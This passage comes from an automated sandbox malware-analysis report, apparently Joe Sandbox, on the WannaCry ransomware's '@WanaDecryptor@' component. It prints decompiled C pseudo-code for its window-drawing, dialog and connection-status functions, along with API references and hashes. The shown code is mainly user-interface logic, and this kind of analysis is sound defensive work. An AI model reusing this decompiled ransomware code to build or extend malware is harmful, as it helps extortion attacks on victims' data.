                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #2514.MFC42 ref: 00405AC1
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                        • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                                      • #800.MFC42 ref: 00405C33
                                                      • #800.MFC42 ref: 00405C47
                                                      • #800.MFC42 ref: 00405C5B
                                                      • #800.MFC42 ref: 00405C6F
                                                      • #781.MFC42 ref: 00405C83
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42 ref: 00405D37
                                                      • #609.MFC42 ref: 00405D4B
                                                      • #616.MFC42 ref: 00405D5C
                                                      • #641.MFC42 ref: 00405D70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringCallbackDispatcherExitFindFocusProcessShowUser
                                                      • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                                      • API String ID: 1759550818-2594244635
                                                      • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                                      • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407A90 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 90COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 289 407a90-407ab7 290 407bf4-407c28 #2385 289->290 291 407abd-407ac5 289->291 292 407ac7 291->292 293 407aca-407ad1 291->293 292->293 293->290 294 407ad7-407af9 call 404c40 #2514 293->294 297 407b72-407bef #2414 * 2 #800 #641 294->297 298 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 294->298 297->290 298->297
                                                      C-Code - Quality: 68%
                                                      			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr _v24;
				char _v32;
				void* _v36;
				char _v44;
				char _v132;
				char* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v152;
				char _v160;
				intOrPtr _v164;
				char _v168;
				void* _v180;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;

				_push(0xffffffff);
				_push(E00413F17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_t73 = _t72 - 0x80;
				_t70 = __ecx;
				if(_a4 == 0x1388) {
					_t43 = __ecx + 0x2f8;
					if(_t43 != 0) {
						_t43 =  *((intOrPtr*)(_t43 + 0x20));
					}
					if(_a8 == _t43) {
						_t44 = E00404C40( &_v132, 0);
						_v8 = 0;
						L00412B72();
						if(_t44 == 1) {
							_push("***");
							L00412CAA();
							_push("\t");
							_v8 = 1;
							L00412F68();
							_push( &_v44);
							L00412F62();
							_push(0x3b);
							_push(0xa);
							L00412F5C();
							_push(0x3b);
							_push(0xd);
							L00412F5C();
							_push(1);
							_v164 = _t73;
							L00412F56();
							E004082C0(_t70,  &_v168,  &_v160);
							_v44 = 0;
							L00412CC2();
						}
						_v4 = 2;
						_v20 = 0x415c00;
						_v136 =  &_v20;
						_v4 = 5;
						L00412D52();
						_v20 = 0x415bec;
						_v136 =  &_v32;
						_v32 = 0x415c00;
						_v4 = 6;
						L00412D52();
						_v32 = 0x415bec;
						_v4 = 2;
						L00412CC2();
						_v4 = 0xffffffff;
						L00412C86();
					}
				}
				_t42 = _a8;
				_push(_a12);
				_push(_t42);
				_push(_a4);
				L00412BAE(); // executed
				 *[fs:0x0] = _v24;
				return _t42;
			}


























                                                      0x00407a96
                                                      0x00407a98
                                                      0x00407a9d
                                                      0x00407aa2
                                                      0x00407aa9
                                                      0x00407ab5
                                                      0x00407ab7
                                                      0x00407abd
                                                      0x00407ac5
                                                      0x00407ac7
                                                      0x00407ac7
                                                      0x00407ad1
                                                      0x00407add
                                                      0x00407ae6
                                                      0x00407af1
                                                      0x00407af9
                                                      0x00407afb
                                                      0x00407b04
                                                      0x00407b09
                                                      0x00407b12
                                                      0x00407b1a
                                                      0x00407b27
                                                      0x00407b28
                                                      0x00407b2d
                                                      0x00407b2f
                                                      0x00407b35
                                                      0x00407b3a
                                                      0x00407b3c
                                                      0x00407b42
                                                      0x00407b47
                                                      0x00407b50
                                                      0x00407b55
                                                      0x00407b5c
                                                      0x00407b65
                                                      0x00407b6d
                                                      0x00407b6d
                                                      0x00407b72
                                                      0x00407b81
                                                      0x00407b89
                                                      0x00407b91
                                                      0x00407b99
                                                      0x00407ba2
                                                      0x00407baa
                                                      0x00407bae
                                                      0x00407bba
                                                      0x00407bc2
                                                      0x00407bcb
                                                      0x00407bd3
                                                      0x00407bdb
                                                      0x00407be4
                                                      0x00407bef
                                                      0x00407bef
                                                      0x00407ad1
                                                      0x00407bfb
                                                      0x00407c09
                                                      0x00407c0a
                                                      0x00407c0b
                                                      0x00407c0e
                                                      0x00407c1b
                                                      0x00407c28

                                                      APIs
                                                      • #2514.MFC42 ref: 00407AF1
                                                      • #537.MFC42(***), ref: 00407B04
                                                      • #941.MFC42(00421234,***), ref: 00407B1A
                                                      • #939.MFC42(?,00421234,***), ref: 00407B28
                                                      • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                                      • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                                      • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                                      • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                                      • #2385.MFC42(?,?,?), ref: 00407C0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                                      • String ID: ***$[A$[A
                                                      • API String ID: 3659526348-3419262722
                                                      • Opcode ID: 7b5a321b8fc36d37a949ca2324a4224a0761ed0f7d540cde034222370581aa5f
                                                      • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                                      • Opcode Fuzzy Hash: 7b5a321b8fc36d37a949ca2324a4224a0761ed0f7d540cde034222370581aa5f
                                                      • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405580 Relevance: 27.2, APIs: 18, Instructions: 187windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 301 405580-4055c1 GetClientRect 302 4055c7-405664 #470 #1168 #8 #323 CreateCompatibleDC #1640 #2860 301->302 303 4057c9-4057e0 301->303 304 405666 302->304 305 405669-4056ac #5785 CreateSolidBrush FillRect 302->305 304->305 306 405770-405777 305->306 307 4056b2-405721 call 405110 BitBlt 305->307 308 405779 306->308 309 40577c-4057c4 #5785 #2405 DeleteObject * 2 #640 #755 306->309 312 405723-405729 307->312 313 40575b-40576a 307->313 308->309 309->303 312->306 314 40572b-40572d 312->314 313->306 313->307 314->313 315 40572f-405734 314->315 315->313 316 405736-40573a 315->316 316->306 317 40573c-405757 316->317 317->313
                                                      C-Code - Quality: 78%
                                                      			E00405580(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v28;
				char _v80;
				void* _v96;
				struct tagRECT _v112;
				signed int _v116;
				void* _v120;
				struct HDC__* _v140;
				long _v144;
				struct tagRECT _v160;
				char _v164;
				void* _v172;
				intOrPtr _v176;
				char _v188;
				int _v192;
				int _v196;
				int _v204;
				intOrPtr _v212;
				void* _v216;
				struct HBRUSH__* _v220;
				char _v224;
				intOrPtr _v228;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				signed int _v256;
				void* _v260;
				void* _v264;
				void* _v268;
				int _v272;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				int _t78;
				long _t79;
				struct HBRUSH__* _t80;
				struct HDC__* _t84;
				char _t85;
				struct HBRUSH__* _t86;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t136;
				void* _t151;
				struct HBRUSH__* _t152;
				void* _t153;
				void* _t156;
				int _t160;
				intOrPtr _t162;

				_push(0xffffffff);
				_push(E00413943);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t162;
				_t156 = __ecx;
				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
				_t160 = 0;
				_v204 = 0;
				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
				_v176 = _t108;
				if(_t108 != 0) {
					L00412DD0(); // executed
					_t79 =  *(_t156 + 0x50);
					_v8 = 0;
					_v164 = 0xffb53f;
					_v160.left = _t79;
					_v160.top = 0x674017;
					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
					_v160.bottom = 0;
					_v144 =  *(_t156 + 0x54);
					L00412E5A();
					_t80 =  *((intOrPtr*)(_t79 + 8));
					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
					_t152 = _t80;
					_v220 = _t152;
					L00412E54();
					asm("sbb eax, eax");
					_v28 = 1;
					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
					_push(_t84);
					L00412E4E();
					_push(_t152); // executed
					L00412DE2(); // executed
					if(_t84 != 0) {
						_t84 =  *(_t84 + 4);
					}
					_push(_t84);
					_t85 = _v224;
					_push(_t85);
					L00412E48();
					_v212 = _t85;
					_t153 = 0;
					_v252 = 1;
					_t86 = CreateSolidBrush( *(_t156 + 0x54));
					_v220 = _t86;
					FillRect(_v140,  &_v160, _t86);
					_t89 = 0;
					_v260 = 0;
					if(_t108 > 0) {
						do {
							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
							E00405110(_t156,  &_v188, _v224);
							asm("sbb eax, eax");
							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
							_t102 =  *((intOrPtr*)(_t156 + 0x74));
							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
							_t153 = _t153 + 1;
							if(_t153 != _t102) {
								goto L10;
							} else {
								_t136 =  *((intOrPtr*)(_t156 + 0x70));
								if(_t136 != 1) {
									if(_t153 != _t102) {
										goto L10;
									} else {
										_t104 = _t136;
										if(_t104 <= 1) {
											goto L10;
										} else {
											if(_v304 != _t104) {
												_t153 = 0;
												_t160 = 0;
												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
												_v304 = _v304 + 1;
												goto L10;
											}
										}
									}
								}
							}
							goto L11;
							L10:
							_t89 = _v296 + 1;
							_v296 = _t89;
						} while (_t89 < _v272);
					}
					L11:
					_t90 = _v228;
					if(_t90 != 0) {
						_t90 =  *((intOrPtr*)(_t90 + 4));
					}
					_push(_t90);
					_push(_v248);
					L00412E48();
					L00412E42();
					DeleteObject(_v264);
					_t78 = DeleteObject(_v244);
					_v80 = 0;
					L00412E3C();
					_v80 = 0xffffffff;
					L00412DB8();
				}
				 *[fs:0x0] = _v12;
				return _t78;
			}























































                                                      0x00405580
                                                      0x00405582
                                                      0x0040558d
                                                      0x0040558e
                                                      0x0040559e
                                                      0x004055a9
                                                      0x004055b2
                                                      0x004055b4
                                                      0x004055b8
                                                      0x004055bd
                                                      0x004055c1
                                                      0x004055d0
                                                      0x004055d5
                                                      0x004055de
                                                      0x004055e5
                                                      0x004055ed
                                                      0x004055f1
                                                      0x004055f9
                                                      0x004055fd
                                                      0x00405601
                                                      0x00405605
                                                      0x0040560d
                                                      0x0040561a
                                                      0x00405620
                                                      0x00405626
                                                      0x0040562a
                                                      0x0040563f
                                                      0x00405641
                                                      0x0040564c
                                                      0x00405652
                                                      0x00405657
                                                      0x0040565c
                                                      0x0040565d
                                                      0x00405664
                                                      0x00405666
                                                      0x00405666
                                                      0x00405669
                                                      0x0040566a
                                                      0x0040566e
                                                      0x0040566f
                                                      0x00405677
                                                      0x0040567c
                                                      0x0040567e
                                                      0x00405686
                                                      0x0040568c
                                                      0x0040569e
                                                      0x004056a4
                                                      0x004056a8
                                                      0x004056ac
                                                      0x004056b2
                                                      0x004056bc
                                                      0x004056c8
                                                      0x004056e7
                                                      0x0040570b
                                                      0x00405719
                                                      0x0040571c
                                                      0x0040571e
                                                      0x00405721
                                                      0x00000000
                                                      0x00405723
                                                      0x00405723
                                                      0x00405729
                                                      0x0040572d
                                                      0x00000000
                                                      0x0040572f
                                                      0x0040572f
                                                      0x00405734
                                                      0x00000000
                                                      0x00405736
                                                      0x0040573a
                                                      0x0040574c
                                                      0x0040574e
                                                      0x00405753
                                                      0x00405757
                                                      0x00000000
                                                      0x00405757
                                                      0x0040573a
                                                      0x00405734
                                                      0x0040572d
                                                      0x00405729
                                                      0x00000000
                                                      0x0040575b
                                                      0x00405763
                                                      0x00405766
                                                      0x00405766
                                                      0x004056b2
                                                      0x00405770
                                                      0x00405770
                                                      0x00405777
                                                      0x00405779
                                                      0x00405779
                                                      0x0040577c
                                                      0x00405781
                                                      0x00405782
                                                      0x0040578b
                                                      0x0040579b
                                                      0x004057a2
                                                      0x004057a8
                                                      0x004057b0
                                                      0x004057b9
                                                      0x004057c4
                                                      0x004057c4
                                                      0x004057d3
                                                      0x004057e0

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                                      • String ID:
                                                      • API String ID: 1233696098-0
                                                      • Opcode ID: d2a394ca3572882bfb2f5d87bffa0f05435ffd103ecaeaaf491a49074e348053
                                                      • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                                      • Opcode Fuzzy Hash: d2a394ca3572882bfb2f5d87bffa0f05435ffd103ecaeaaf491a49074e348053
                                                      • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401600 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 120windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 318 401600-401614 319 4016e5-4016e7 318->319 320 40161a-40161b 318->320 321 401734-401737 319->321 322 4016e9-401731 #537 call 401970 SendMessageA #2385 319->322 323 40161d-40161e 320->323 324 40168f-401691 320->324 326 401743-401754 #2385 321->326 328 401739 321->328 323->326 327 401624-401626 323->327 329 401693-4016db #537 call 401970 SendMessageA #2385 324->329 330 4016de-4016e1 324->330 332 401628-40165b #537 call 401970 #2385 327->332 333 40165e-401661 327->333 328->326 330->326 335 4016e3 330->335 333->330 337 401663-40168c #537 call 401970 #2385 333->337 335->328
                                                      C-Code - Quality: 65%
                                                      			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* _t19;
				long _t21;
				long _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				long _t48;
				void* _t49;
				intOrPtr _t50;

				_t27 = _a4;
				_t48 = _a8;
				_t19 = _t27 - 0x4e20;
				_t49 = __ecx;
				if(_t19 == 0) {
					if(_t48 != 0) {
						if(_t48 == 0xffffffff) {
							goto L14;
						}
						goto L15;
					} else {
						_push(__ecx);
						_a4 = _t50;
						L00412CAA();
						E00401970("Connected");
						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
						_push(_a4);
						_push(_t48);
						_push(_t27);
						 *(_t49 + 0xb0) = 0x23;
						L00412BAE();
						return _t21;
					}
				} else {
					_t19 = _t19 - 1;
					if(_t19 == 0) {
						if(_t48 != 0) {
							goto L9;
						} else {
							_push(__ecx);
							_a4 = _t50;
							L00412CAA();
							E00401970("Sent request");
							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
							_push(_a4);
							_push(_t48);
							_push(_t27);
							 *(_t49 + 0xb0) = 0x28;
							L00412BAE();
							return _t24;
						}
					} else {
						_t19 = _t19 - 1;
						if(_t19 != 0) {
							L15:
							_push(_a12);
							_push(_t48);
							_push(_t27); // executed
							L00412BAE(); // executed
							return _t19;
						} else {
							if(_t48 != 0) {
								if(_t48 != 1) {
									L9:
									if(_t48 == 0xffffffff) {
										L14:
										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
									}
									goto L15;
								} else {
									_push(__ecx);
									_a4 = _t50;
									L00412CAA();
									_t25 = E00401970("Succeed");
									_push(_a4);
									_push(_t48);
									_push(_t27);
									L00412BAE();
									return _t25;
								}
							} else {
								_push(__ecx);
								_a4 = _t50;
								L00412CAA();
								_t26 = E00401970("Received response");
								_push(_a4);
								_push(_t48);
								_push(_t27);
								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
								L00412BAE();
								return _t26;
							}
						}
					}
				}
			}












                                                      0x00401601
                                                      0x00401609
                                                      0x0040160d
                                                      0x00401612
                                                      0x00401614
                                                      0x004016e7
                                                      0x00401737
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004016e9
                                                      0x004016e9
                                                      0x004016ec
                                                      0x004016f5
                                                      0x004016fc
                                                      0x00401710
                                                      0x0040171c
                                                      0x0040171d
                                                      0x0040171e
                                                      0x0040171f
                                                      0x00401729
                                                      0x00401731
                                                      0x00401731
                                                      0x0040161a
                                                      0x0040161a
                                                      0x0040161b
                                                      0x00401691
                                                      0x00000000
                                                      0x00401693
                                                      0x00401693
                                                      0x00401696
                                                      0x0040169f
                                                      0x004016a6
                                                      0x004016ba
                                                      0x004016c6
                                                      0x004016c7
                                                      0x004016c8
                                                      0x004016c9
                                                      0x004016d3
                                                      0x004016db
                                                      0x004016db
                                                      0x0040161d
                                                      0x0040161d
                                                      0x0040161e
                                                      0x00401743
                                                      0x00401749
                                                      0x0040174a
                                                      0x0040174b
                                                      0x0040174c
                                                      0x00401754
                                                      0x00401624
                                                      0x00401626
                                                      0x00401661
                                                      0x004016de
                                                      0x004016e1
                                                      0x00401739
                                                      0x00401739
                                                      0x00401739
                                                      0x00000000
                                                      0x00401663
                                                      0x00401663
                                                      0x00401666
                                                      0x0040166f
                                                      0x00401676
                                                      0x00401681
                                                      0x00401682
                                                      0x00401683
                                                      0x00401684
                                                      0x0040168c
                                                      0x0040168c
                                                      0x00401628
                                                      0x00401628
                                                      0x0040162b
                                                      0x00401634
                                                      0x0040163b
                                                      0x00401646
                                                      0x00401647
                                                      0x00401648
                                                      0x00401649
                                                      0x00401653
                                                      0x0040165b
                                                      0x0040165b
                                                      0x00401626
                                                      0x0040161e
                                                      0x0040161b

                                                      APIs
                                                      • #2385.MFC42 ref: 00401653
                                                      • #537.MFC42(Received response), ref: 00401634
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • #537.MFC42(Succeed), ref: 0040166F
                                                      • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                                      • #537.MFC42(Sent request), ref: 0040169F
                                                      • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                                      • #2385.MFC42 ref: 004016D3
                                                      • #537.MFC42(Connected), ref: 004016F5
                                                      • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                                      • #2385.MFC42 ref: 00401729
                                                      • #2385.MFC42(?,?,?), ref: 0040174C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2385$#537$MessageSend$#3092#6199#800
                                                      • String ID: Connected$Received response$Sent request$Succeed
                                                      • API String ID: 3790904636-3692714192
                                                      • Opcode ID: 4248ce8c7a47d30574ec48fc369442f637571c250744fd81582f6567f40f10fe
                                                      • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                                      • Opcode Fuzzy Hash: 4248ce8c7a47d30574ec48fc369442f637571c250744fd81582f6567f40f10fe
                                                      • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004063A0 Relevance: 22.6, APIs: 15, Instructions: 82COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 352 4063a0-4064b5 #2302 * 12 #2370 * 3
                                                      APIs
                                                      • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                                      • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                                      • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                                      • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                                      • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                                      • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                                      • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                                      • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                                      • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                                      • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                                      • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                                      • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                                      • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                                      • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                                      • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2302$#2370
                                                      • String ID:
                                                      • API String ID: 1711274145-0
